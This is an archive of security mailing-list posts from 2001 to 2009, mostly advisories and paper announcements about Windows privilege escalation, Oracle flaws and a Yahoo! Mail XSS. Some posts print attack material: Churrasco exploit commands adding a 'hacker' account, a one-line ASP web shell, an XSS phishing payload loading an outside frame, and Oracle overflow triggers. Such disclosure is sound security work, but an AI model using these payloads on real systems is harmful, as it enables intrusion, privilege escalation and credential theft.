Opening Intranets to attack by using Internet Explorer [paper]

2009-04-10 Thread Cesar

Hi

Just released a new paper I guess it will be very interesting for list members.

http://nomoreroot.blogspot.com/2009/04/opening-intranets-to-attacks-by-using.html

I will be glad to hear your feedback.

Enjoy.

Cesar.


  


Token Kidnapping Windows 2003 PoC exploit

2008-10-08 Thread Cesar

(From 
http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation 
(http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I 
decided to release a PoC exploit for Win2k3 that alows to execute code under 
SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own 
Windows, this is because Windows services accounts can impersonate.
Other process (not services) that can impersonate are IIS 6 worker processes so 
if you can run code from an ASP .NET or classic ASP web application then you 
can own Windows too. If you provide shared hosting services then I would 
recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own 
Windows:

exec xp_cmdshell 'churrasco net user /add hacker'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath(churrasco.exe);
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments=  \net user /add hacker\ ;
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.

Cesar.


  


Re: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL Server Restore Integer Underflow Vulnerability

2008-07-09 Thread Cesar

Just to clarify, the following SQL Server vulnerabilities vulnerabilities:

SQL Server Buffer Overrun Vulnerability - CVE-2008-0106
SQL Server Memory Corruption Vulnerability - CVE-2008-0107
Convert Buffer Overrun - CVE-2008-0086

 can be exploited to take complete control of the system on Windows 2003, 
it doesn't matter the user account under SQL Server service is running.

On Windows 2008 if the service is running under Network Service or Local 
Service account then full system compromise is always possible.

*see http://www.argeniss.com/research/TokenKidnapping.pdf 

Cesar.

--- On Tue, 7/8/08, iDefense Labs [EMAIL PROTECTED] wrote:

 From: iDefense Labs [EMAIL PROTECTED]
 Subject: [Full-disclosure] iDefense Security Advisory 07.08.08: Microsoft SQL 
 Server Restore Integer Underflow Vulnerability
 To: [EMAIL PROTECTED], [EMAIL PROTECTED], bugtraq@securityfocus.com
 Date: Tuesday, July 8, 2008, 11:18 PM
 iDefense Security Advisory 07.08.08
 http://labs.idefense.com/intelligence/vulnerabilities/
 Jul 08, 2008
 
 I. BACKGROUND
 
 SQL Server is Microsoft's database server product. It
 supports the
 restoration and inspection of backups via SQL statements.
 For more
 information see the vendor's website found at the
 following URL.
 
 http://www.microsoft.com/sql/default.mspx



  


Token Kidnapping (Microsoft Security Advisory 951306) presentation available

2008-04-19 Thread Cesar
Presentation is available at:
http://www.argeniss.com/research/TokenKidnapping.pdf

Exploit code won't be released for a while due to
Microsoft request.

Enjoy.

Cesar.


  

Be a better friend, newshound, and 
know-it-all with Yahoo! Mobile.  Try it now.  
http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ


[Argeniss] Data0: Next generation malware for stealing databases (Paper)

2007-11-22 Thread Cesar
Hey, I'm releasing this new paper, not big deal but
interesting.
http://www.argeniss.com/research/Data0.pdf

Abstract: 
This paper it's about Data0, a fictitious (or not)
simple PoC of new malware that after it's 
deployed on a computer in an internal network it will
automatically hack database servers and 
steal their data. Several techniques used by Data0
will be detailed. Data0 will be targeting 
Microsoft SQL Server and Oracle Database Server two of
the most used database servers. 
While Data0 could be used by the bad guys for evil
purposes, it could also be used by security 
professionals and organizations to determine how
strong networks, workstations, database 
servers, etc. are against this kind of attack. 
This paper is not intended to be a cook book for cyber
criminals, it's intended to show people 
that by implementing simple techniques malware can
become “smarter” and cause a lot more 
damage in a very near future.


Cesar.


  

Never miss a thing.  Make Yahoo your home page. 
http://www.yahoo.com/r/hs


[Argeniss] Hacking Databases for owning your data (paper)

2007-04-13 Thread Cesar
Abstract:
Data theft is becoming a major threat, criminals have
identified where the money is. In the last years many
databases from fortune 500 companies were compromised
causing lots of money losses. This paper will discuss
the data theft problem focusing on database attacks,
we will show actual information about how serious the
data theft problem is, we will explain why you should
care about database security and common attacks will
be described, the main part of the paper will be the
demonstration of unknown and not well known attacks
that can be used or are being used by criminals to
easily steal data from your databases, we will focus
on most used database servers: MS SQL Server and
Oracle Database, it will be showed how to steal a
complete database from Internet, how to steal data
using a database rootkit and backdoor and some
advanced database 0day exploits. We will demonstrate
that compromising databases is not big deal if they
haven't been properly secured. Also it will be
discussed how to protect against attacks so you can
improve database security at your site.

http://www.argeniss.com/research/HackingDatabases.zip
(Tools and exploits included)


Enjoy.

Cesar.


   

Looking for earth-friendly autos? 
Browse Top Cars by Green Rating at Yahoo! Autos' Green Center.
http://autos.yahoo.com/green_center/


[Argeniss] Practical 10 minutes security audit: Oracle Case (Paper)

2007-03-11 Thread Cesar
Hi.

Abstract:
This paper will show a extremely simple technique to
quickly audit a software product in order
to infer how trustable and secure it is. I will show
you step by step how to identify half dozen
of local 0day vulnerabilities in few minutes just
making a couple of clicks on very easy to use
free tools, then for the technical guys enjoyment the
vulnerabilities will be easily pointed out
on disassembled code and detailed, finally a 0day
exploit for one of the vulnerabilities will be
demonstrated.
While this technique can be applied to any software in
this case I will take a look at the latest
version of Oracle Database Server: 10gR2 for Windows,
which is a extremely secure product
so it will be a very difficult challenge to find
vulnerabilities since Oracle is using advanced next
generation tools to identify and fix vulnerabilities

http://www.argeniss.com/research/10MinSecAudit.zip
(PoC exploit included)

Thanks.

Cesar.



 

Need Mail bonding?
Go to the Yahoo! Mail QA for great tips from Yahoo! Answers users.
http://answers.yahoo.com/dir/?link=listsid=396546091


The Week of Oracle Database Bugs

2006-11-21 Thread Cesar
The Week of Oracle Database Bugs 
Based on the great idea of H D Moore Month of Browser
Bugs and LMH Month of Kernel Bugs, we are proud to
announce that we are starting on December the Week of
Oracle Database Bugs (WoODB). 

What is the WoODB about? 
An Oracle Database 0day will be released every day for
a week on December. 

Why are you doing this? 
We want to show the current state of Oracle software
(in)security also we want to demostrate Oracle isn't
getting any better at securing its products (you
already know the history: two years or more to fix a
bug, not fixing bugs, failing to fix bugs, lying about
security efforts, etc, etc, etc.). 

Why are you targeting only Oracle? 
We have 0days for all Database software vendors but
Oracle is The #1 Star when talking about lots of
unpatched vulnerabilities and not caring about
security. 

Why not the Month of Oracle Database Bugs?
We could do the Year of Oracle Database Bugs but we
think a week is enough to show how flawed Oracle
software is, also we don't want to give away all our
0days:), anyways if you want to contribute send your
Oracle 0days so this can be extended for another week
or more.


See:
http://www.argeniss.com/woodb.html

Cesar.




 

Sponsored Link

Mortgage rates near 39yr lows. 
$420k for $1,399/mo. Calculate new payment! 
www.LowerMyBills.com/lre


MS06-034 lies? IIS 6 can still be owned?

2006-07-26 Thread Cesar
Hi all.

After early getting the details of MS06-034 I thought
it will be cool to build the exploits since there has
been long time without any IIS exploit and our
customers  (see *1) will like it, so I asked the guys
to build the exploits and that I will take care of the
part of elevating privileges since I had some theory
that there was a way to elevate privileges. 
What was funny is that some time later I realized that
if you can upload an asp page then it's pretty simple
to have a remote shell running under the same account
that the exploits would run:

-shell.asp (got this from xfocus.org)--
%=server.createobject(wscript.shell).exec(cmd.exe
/c   request(command)).stdout.readall%
---
So I wonder why MS patched the vulnerability if it's
pretty simple to have a remote shell on default
configurations?

Mabye because wscript.shell can be disabled, removed,
etc. or you can't run nor upload .exe on the server,
in these cases the exploit will be handy.

Also MS stated:
-
on Mitigating Factors 

• On IIS 5.0 and IIS 5.1, ASP enabled applications by
default run in the 'Pooled Out of Process'
application, which means they run in DLLHOST.exe,
which is running in the context of the low privilege
IWAM_machinename account.
  
• By default, ASP is not enabled on IIS 6.0. If ASP is
enabled, it runs in the context of a W3WP.exe worker
process running as the low privilege 'NetworkService'
account.

on FAQ Workarounds...
-What might an attacker use the vulnerability to do?
An attacker who successfully exploited this
vulnerability could take complete control of the
affected system.

--
That's pretty confusing since they are saying IIS 5 
6 runs under a low privileged accounts and then they
say an attacker could take complete control...???

My theory on the elevation of privileges was in part
wrong but I could elevate privileges so now the
exploits can also give you a remote shell under an
administrative account which I think this is why MS
patched the vulnerability.
While MS fixed the ASP vulnerability they didn't fixed
a design flaw that allows to elevate privilges if you
can run code under IIS 5  6 low privileged accounts
:)

So no matter if you applied the fix, if you let users
to upload an run binaries from ASP pages on default
settings then your server can still be owned.



Cesar.
(*1 http://www.argeniss.com/products.html)

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


Re: Re[2]: The Weakness of Windows Impersonation Model

2006-05-31 Thread Cesar

Actually, I would say: a process running as a service
can impersonate almost any other running processes
user accounts since you can force processes conect to
your service using LPC.

Cesar.

--- Brian L. Walche [EMAIL PROTECTED] wrote:

 
 Just one important note regarding Database Security
 Brief:

http://www.databasesecurity.com/dbsec/db-sec-tokens.pdf
 Why should I never logon to a Windows database
 server if I've got
 admin privileges?
 
 We describe a little different problem for MS SQL.
 MS SQL gets
 privileged context on its own from MSDTC. So it
 doesn't matter if
 administrator was logged into database or not.
 
 MS SQL service's default state after its start is
 sufficient. A
 suggested policy to refrain admin logons will not
 protect for MSSQL.
 
 Additionally, to exploit this usually you no need a
 sleeper that
 waits for privileged client to logon. Impersonating
 processes often
 keep their impersonation tokens for a while. In
 order to exploit an
 attacker needs just search for token handles. The
 list of handles can
 be retrieved through Windows native API.
 
 
 Brian L. Walche,
 http://www.gentlesecurity.com
 
  Hi Brian,
  I wrote a paper on this subject last year,
 Snagging Security Tokens to
  Elevate Privileges
  (http://www.databasesecurity.com/dbsec-briefs.htm)
 after 
  Tim Mullen and thrashed out a few details at
 Blackhat last year over a few
  White Russians. The paper discusses the problem in
 the context of database
  servers and examines the LogonUser() and
 AcceptSecurityContext() functions.
  I believe Longhorn/Vista will address many of
 issues that currently affect
  impersonation.
  Cheers,
  David Litchfield
  http://www.databasesecurity.com/
  http://www.ngssoftware.com/
 
 
 
  - Original Message - 
  From: Brian L. Walche [EMAIL PROTECTED]
  To: bugtraq@securityfocus.com
  Sent: Tuesday, May 16, 2006 7:25 PM
  Subject: The Weakness of Windows Impersonation
 Model
 
 
  The Weakness of Windows Impersonation Model
  http://www.gentlesecurity.com/04302006.html
 
  Summary
 
  1. Network Service account’s context is elevated
 to LocalSystem.
  2. A context of MS SQL service running as unique
 user account is
  elevated up to LocalSystem.
  3. Any service’s context could be elevated to
 LocalSystem
 
  There is an immanent risk to run network services
 as privileged
  account, e.g. LocalSystem or Administrator. The
 threat is widely
  accepted and recognized. However, most are not
 aware that nearly the
  same risk is present for a service configured to
 run on behalf of
  non-privileged account such as Network Service,
 Local Service or
  unique user.
 
 
  Technical Details
 
  Security implications of impersonation are not
 new, but are not widely
  recognized and understood. By definition,
 impersonation allows a
  server application to replace (impersonate) its
 security context
  (credentials) by context of client. In general,
 impersonation assumes
  a server reduces its privileges but it also
 imposes a threat of
  unauthorized privilege elevation.
 
  The attack scenario is well known and understood.
 An attacker
  terminates, pauses or crashes a privileged server
 application and
  starts its own one with the same interface. It
 receives requests from
  privileged client and impersonate. There were
 number of attacks
  reported that have used this approach with named
 pipes [1, 2, 3].
  However, the scope is not limited to named pipes.
 Any communication
  channel that supports impersonation can be
 hijacked for privilege
  elevation purposes, including LPC, RPC, DDE, COM,
 etc. Named pipe
  interfaces are merely less opaque and easier to
 discover and exploit.
 
  Provided threat of impersonation led to creating
 of a separate
  privilege – “Impersonate a client after
 authentication”. Therefore,
  since Windows XP only LocalSystem, Administrators
 and services have
  this privilege by default [4] and can impersonate
 to client’s
  credentials. Regular users are not able to exploit
 impersonation
  anymore, but services (special processes managed
 by Service Control
  Manager) still can. The risk of services run as
 LocalSystem and
  Administrators is recognized, however the threat
 of other accounts
  used to run services is underestimated. Network
 Service, Local Service
  and even unique user accounts used to run a
 service still allow
  privilege elevation for intruder who successfully
 attacked a service.
 
  There are two attack scenarios:
  1) If a service does not impersonate highly
 privileged clients then an
  attacker who breaks into such service can simulate
 communication
  interface used by privileged services.
  2) If a service happen to impersonate highly
 privileged clients then
  attacker’s task is easier, he needs just catch up
 privileged client
  context during impersonation.
 
  Windows XP and Windows 2003 use Network Service
 account to run
  critical services such as Remote Procedure Call
 (RPC), which
  impersonate privileged

Re: [Full-disclosure] RE: Oracle, where are the patches???

2006-05-04 Thread Cesar

I think everything about Oracle has been said,
everything is in the table to show how really bad
Oracle is at security, but only few people seems to
get the message, I wonder if at least goverments are
paying attention since national infraestructure
systems are running with Oracle, what else we can do
to have this sad company to start taking security
seriously?
 So if people at .gov is hearing you should be worry
about national security and start acting on Oracle, I
guess .gov don't want their data easily compromised.


Cesar.



__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


[Argeniss] Alert - Yahoo! Mail XSS vulnerability

2006-04-28 Thread Cesar
Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:

 ...Message text ...BRBRa target=_blank   
href=www.blabla23.comstyle=background:url\(java/**/script:document.write('frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0frame frameborder=0
src=http://w00tynetwork.com/x//frameset'))/ap

You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.

Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't hear any
news about them. It seems that the issue was fixed
because now the same message is displayed as:

  ...Message text ...BRBRa target=_blank   
href=www.blabla23.comstyle=background:url\(_java/**/script:document.write('xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0xframe frameborder=0
src=http://w00tynetwork.com/x//frameset'))/ap

Now filters were improved, whenever the word
javascript appears a _ is appended at the begining,
and a x is appended at the begining of dangerous
HTML tags.

Again Yahoo! didn't released any advisory nor
contacted customers about this issue. 
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.



Cesar.


__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam
protection around 
http://mail.yahoo.com 

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


Re: Recent Oracle exploit is _actually_ an 0day with no patch

2006-04-28 Thread Cesar
David is right, we also have reported hundreds of
vulnerabiities to Oracle and they only fix what you
report to them, they don't care to fix the same
vulnerability on different portions of code, one good
example is that Oracle should have eliminated SQL
injection bugs since long time ago but there are still
SQL injection bugs all around because they only fix
bugs reported by researchers. I remember Mary Ann
Davidson saying Oracle finds more than 75 percent of
significant security vulnerabilities in-house
(http://news.com.com/When+security+researchers+become+the+problem/2010-1071_3-5807074.html)
so WTF you don't fix them!

I really can't understand how customers don't demand
better security to Oracle or switch to other vendor, I
would like to have customers like that so you can sell
very unsecure products to them and them won't ever
complain so I can save billons not improving security
on products and make a lot of money.

PS: Look at this paper dated February 2002, amazing
how Oracle efforts are visible on 2006! 
http://www.cgisecurity.com/database/oracle/pdf/unbreak3.pdf


Cesar.

--- David Litchfield [EMAIL PROTECTED] wrote:

 
 The recent Oracle exploit posted to Bugtraq
 (http://www.securityfocus.com/archive/1/431353) is
 actually an 0day
 and has no patch.
 
  The referenced exploit seems to use
 GET_DOMAIN_INDEX_METADATA with a
  TYPE_NAME that references an attacker-defined
 package with a
  (modified?) ODCIIndexGetMeta function.
 
  Your last example uses GET_V2_DOMAIN_INDEX_TABLES,
 with arguments that
  reference an attacker-defined package with a
 (modified?)
  ODCIIndexUtilGetTableNames function.
 
  Is this a surface-level discrepancy, or is your
 vector substantively
  different than the one in the exploit?  If these
 are different, then
  is it possible that last week's exploit was
 actually fixed?
 
 No; the same problem occurs. This is the kind of
 general problem I'm 
 speaking about. Most vendors that actually
 understand security will look for 
 other bugs in the same functional area if you point
 out a bug. IMO, my job 
 as a security vulnerability researcher is to
 highlight problem areas - i.e. 
 areas of functionality that are rife with issues.
 How can Oracle fix one 
 issue but miss the same flaw two lines later??? In
 this case though, we're 
 not just talking about one flaw but several. Really,
 it is inconceivable, 
 yet they, somehow, manage to do it.
 
 God forbid that any of our critical national
 infrastructure runs on this 
 product oops it does :(
 
 And every version from 8 through 9 to 10 release 2
 is vulnerable. That's 
 every supported version of Oracle on every operating
 system.
 
 Oracle customers: honestly - Oracle are not going to
 listen to the likes of 
 me - but they will listen folks like you. If you're
 not happy with the 
 response you're getting from Oracle then get on the
 'phone - call them up 
 and tell them that you're not happy. Please, demand
 improvements.
 
 By the way, this is not an isolated incident. I have
 many examples to hand 
 where Oracle have tried to fix problems in the same
 functional area but only 
 whitewashed it. They should be proactively looking
 for similar issues in the 
 same code just like Microsoft does.
 
 The champion of quality coding movement 
 (http://www.cio.com/archive/031505/security.html) ,
 who applauds ethical 
 hacking, asks Why isn't that standard development
 process?
 
 I don't know... but I don't think we'll find out in
 the two year time frame 
 posited; we've got less than a year to go.
 
 
  - Steve
 
  P.S. For those of you who are paying attention at
 this excruciating
  level of detail, it seems that David's original
 use of
  GET_DOMAIN_INDEX_METADATA in 2004 directly
 included the code in the
  NEWBLOCK argument, whereas last week's exploit was
 performed through
  an indirect reference to the code in the TYPE_NAME
 argument.
 
 p.p.s.
 
 Just to clarify the issues:
 
 GET_DOMAIN_INDEX_TABLES
 GET_DOMAIN_INDEX_METADATA
 GET_V2_DOMAIN_INDEX_TABLES
 
 are all vulnerable to the exploit.
 
 Cheers,
 David Litchfield
 NGSSoftware Ltd,
 http://www.ngssoftware.com/
 +44 (0) 208 401 0070
 
 


__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


[Argeniss] Oracle Database 10gR1 Buffer overflow in VERIFY_LOG procedure

2006-04-20 Thread Cesar
Argeniss Security Advisory


Name:  Oracle Database 10gR1 Buffer overflow in
VERIFY_LOG procedure (DB03)
Affected Software:  Oracle Database Server version
10gR1
Severity:  High
Remote exploitable:  Yes (Authentication to Database
Server is needed)
Credits:  Esteban Martínez Fayó
Date:  4/18/2006
Advisory Number:  ARG040603


Details: 
Oracle Database Server provides the DBMS_SNAPSHOT_UTL
package that includes capability to manage
materialized views.
This package contains the public procedure VERIFY_LOG
that is vulnerable to buffer overflow.

By default DBMS_SNAPSHOT_UTL has EXECUTE permission to
PUBLIC so any Oracle database user can exploit this
vulnerability.
Exploitation of this vulnerability allows an attacker
to execute arbitrary code. It can also be exploited to
cause DoS (Denial of Service) killing Oracle server
process. 


Vendor Status:
Vendor was contacted and a Critical Patch Update was
released.


Workaround:
Restrict access to the DBMS_SNAPSHOT_UTL package (See
Links section).


Patch Available:
Although this security bug is addressed in the
Critical Patch Update April 2006, for most of the
affected platforms there are no patches available at
this moment.
Oracle informed that the missing patches would be
available on 01-May-06 


Links:
http://www.argeniss.com/research/ARGENISS-ADV-040603.txt
http://www.argeniss.com/research/Workaround-ADV-040603.sql
http://www.oracle.com/technology/deploy/security/pdf/cpuapr2006.html


Spam:
Searching for Oracle 0days? 
Argeniss Ultimate 0day Exploits Pack
http://www.argeniss.com/products.html


Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com



__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


[Argeniss] Alert - Yahoo! Webmail XSS

2006-04-17 Thread Cesar
Hi.

I just got a targeted phishing attack to one of my
Yahoo email accounts, what it´s insteresting it's that
the attack exploits a Yahoo! webmail 0day XSS
vulnerability. 
I'm trying to contact Yahoo right now but in the
meantime I thought it will be good to provide some
bits because the seriousness of this . 
When you browse a message on Yahoo! Webmail the XSS
exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ,it's interesting that the
address bar at IE dosn´t refresh to show the actual
URL, you can only see the redirection to
http://w00tynetwork.com/x/ on IE status bar if you
have it visible.
I don't know if this vulnerability is being exploited
on the wild since it was a targeted attack, I'm sure
about this because the content of the message.

Here is an extract from the exploit so you can start
build some signatures, filtering, etc.
---
(java/**/script:document.write('frameset cols=100%
rows=100% border=0 frameboarder=0framespacing=0frame
frameborder=0
src=http://w00tynetwork.com/x//frameset'))
---

I will provide full details later when Yahoo! fix the
issue.
If security vendors are insterested on full details
plese ask for them at infoatargeniss.com

Cesar.


__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


WLSI - Windows Local Shellcode Injection - Paper

2006-03-15 Thread Cesar
Hi.

For those who didn't attend to Black Hat Europe nor
EuSecWest, here is the paper on which the presentation
was based.


WLSI - Windows Local Shellcode Injection

Abstract:
This paper describes a new technique to create 100%
reliable local exploits for Windows
operating systems, the technique uses some Windows
operating systems design weaknesses
that allow low privileged processes to insert data on
almost any Windows processes no matter
if they are running under high privileges. We all know
that local exploitation is much easier
than remote exploitation but it has some difficulties.
After a brief introduction and a description
of the technique, a couple of samples (Exploits for
MS05-012 and MS05-040) will be provided so the reader
will be able to write
his/her own exploits.

http://www.argeniss.com/research/WLSI.zip

Enjoy.

Cesar.

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


[Argeniss] Oracle Database Buffer overflows vulnerabilities in public procedures of XDB.DBMS_XMLSCHEMA{_INT}

2006-01-27 Thread Cesar
Argeniss Security Advisory


Name:  Oracle Database Buffer overflows
vulnerabilities in public procedures of
XDB.DBMS_XMLSCHEMA{_INT}
Affected Software:  Oracle Database Server versions
9iR2 and 10gR1
Severity:  High
Remote exploitable:  Yes (Authentication to Database
Server is needed)
Credits:  Esteban Martínez Fayó
Date:  1/26/2006
Advisory Number:  ARG010601


Details: 
Oracle Database Server provides the DBMS_XMLSCHEMA and
DBMS_XMLSCHEMA_INT Packages that include procedures to
register and delete XML schemas.
These packages contain the public procedures
GENERATESCHEMA and GENERATESCHEMAS that are vulnerable
to buffer overflow attacks.

By default XDB.DBMS_XMLSCHEMA{_INT} has EXECUTE
permission to PUBLIC so any Oracle database user can
exploit this vulnerability.
Exploitation of this vulnerability allows an attacker
to execute arbitrary code. It can also be exploited to
cause DOS (Denial of service) killing Oracle server
process. 


To reproduce the vulnerabilities execute the next
PL/SQL:


SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMA('LongStringHere',
'OrLongStringHere') from dual;



SELECT
XDB.DBMS_XMLSCHEMA.GENERATESCHEMAS('LongStringHere',
'OrLongStringHere') from dual;



DECLARE
  a SYS.XMLTYPE; -- return value
BEGIN
  a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMA
('LongStringHere', 'OrLongStringHere', '', FALSE,
FALSE, FALSE);
END;



DECLARE
 a SYS.XMLSEQUENCETYPE; -- return value
BEGIN
  a := XDB.DBMS_XMLSCHEMA_INT.GENERATESCHEMAS
('LongStringHere', 'OrLongStringHere', '', '', FALSE,
FALSE);
END;



PoC Exploits:
http://www.argeniss.com/research/OraGENERATESCHEMAExploits.txt


Vendor Status:
Vendor was contacted and a patch was released.


Workaround:
Restrict access to the XDB.DBMS_XMLSCHEMA and
XDB.DBMS_XMLSCHEMA_INT packages.


Patch Available:
Apply Oracle Critical Patch Update January 2006
available at Oracle Metalink.


Links:
http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html



Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com

__
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


Re: FW: Windows Update - Unsafe ActiveX control (fwd)

2003-07-18 Thread Cesar
Hi.

I wouldn't consider Windows Update ActiveX as safe,
the ActiveX has dangerous methods, for example it can
reboot the computer. Of course the ActiveX checks for
the current site and if it's not Windows Update site
it won't work, but if there is some XSS hole in
Windows Update site or if there is a bug in IE that
allows to trick the URL, then the ActiveX becomes very
dangerous. In my opinion restricting an ActiveX to a
specific site only reduce the attack surface but it
doesn't make an ActiveX safe.

Cesar.
--- Dave Ahmad [EMAIL PROTECTED] wrote:
 
 -- Forwarded message --
 Date: Thu, 17 Jul 2003 XX:XX:XX
 To: Dave Ahmad [EMAIL PROTECTED]
 Subject: FW: Windows Update - Unsafe ActiveX control
 
 Hi,
 
 I would prefer not to reply to this post directly,
 but if possible can
 you please mention the following (anonymously):
 
 --
 Safe for Scripting simply means that the control
 is safe to be used
 from untrusted callers. SFS controls can access
 files and other
 resources if it is in a controlled way (eg, with the
 consent of the
 user). Windows Update is safe because it only allows
 itself to be hosted
 from the Windows Update site. If you try and host
 the control from
 another domain, the control will not work. Since the
 Windows Update site
 only ever uses the control for good purposes, and
 requires the user's
 consent to install patches, etc. it is considered
 Safe for Scripting.
 _All_ ActiveX controls can access memory and
 registers directly, whether
 they are marked as safe or not, since they typically
 are implemented in
 native code ;-)
 
 Windows Update does not require you to run unsafe
 controls;
 unfortunately the generic error that appears when
 you disable scripting
 of _safe_ controls makes it sound like there are
 _unsafe_ controls. If
 you enable scripting of safe controls then the
 site should work fine.
 If you are concerned about securing the browser, I
 recommend that you
 place Windows Update in the Trusted Sites zone and
 run that in the
 Medium security mode, and run the rest of the
 Internet Zone in
 High mode, although this will break a lot of
 sites.
 


__
Do you Yahoo!?
SBC Yahoo! DSL - Now only $29.95 per month!
http://sbc.yahoo.com


RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0

2001-07-25 Thread Vega, Cesar

Same thing in AIX 4.2.1.0 and HP-UX 10.20/11.00, previously configured as
Trusted System.

Cordial Greetings,

CVC

#  -Original Message-
#  From: Stephanie Thomas [mailto:[EMAIL PROTECTED]]
#  Sent: Wednesday, July 25, 2001 11:18 AM
#  To: Emre Yildirim; [EMAIL PROTECTED]
#  Subject: RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0
#  
#  
#  Hi Emre,
#  
#  We have tested OpenBSD and NetBSD, and have found
#  that they do not experience this vulnerability, 
#  even with ssh 3.0.0 installed.
#  
#  This is most likely due to the method used to encrypt the 
#  password in /etc/passwd or /etc/shadow.
#  
#  Best Regards,
#  
#  Steph
#  
#  -Original Message-
#  From: Emre Yildirim [mailto:[EMAIL PROTECTED]]
#  Sent: Monday, July 23, 2001 5:12 PM
#  To: [EMAIL PROTECTED]
#  Cc: [EMAIL PROTECTED]
#  Subject: RE: URGENT SECURITY ADVISORY FOR SSH SECURE SHELL 3.0.0
#  
#  
#  
#   SSH Secure Shell 3.0.0 does not ship with any
#   of the operating systems mentioned, nor does the
#   announcement specify that it does. However, if a
#   user has explicitly installed SSH Secure Shell 3.0.0
#   on any of the listed operating systems, they are
#   vulnerable to this potential exploit.
#  
#  
#  I don't want to drag this boring thread any longer, but in
#  your advisory, it stated that OpenBSD and NetBSD were
#  not vulnerable.  So...if I install SSH 3.0.0 on one of those
#  (even though the already come with openssh), ssh will not
#  be vulnerable to this bug?  Or will it?  I think that part
#  created a little confusion.
#  
#  
#  Cheers
#  
#  
#  



Palm Pilot - How to view hidden files

2001-02-12 Thread Paulo Cesar Breim

The software Tiny Sheet, present in all versions of Palm Pilot, has a
function called IMPORT file.
Well when this function is use ALL FILES, including the hidden files
protetex with password, can be imported to a Sheet.